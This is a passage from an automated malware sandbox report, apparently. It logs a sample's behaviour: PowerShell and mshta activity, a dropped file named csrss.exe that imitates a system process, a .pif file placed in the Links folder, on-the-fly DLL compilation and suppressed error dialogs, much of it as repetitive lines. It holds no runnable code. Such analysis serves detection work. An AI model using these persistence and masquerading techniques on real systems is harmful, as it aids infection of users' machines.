                  Source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile created: C:\Users\user\Links\dajivhqI.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile created: C:\Users\user\Links\dajivhqI.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\csrss[1].exeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA64E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_02EA64E4
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
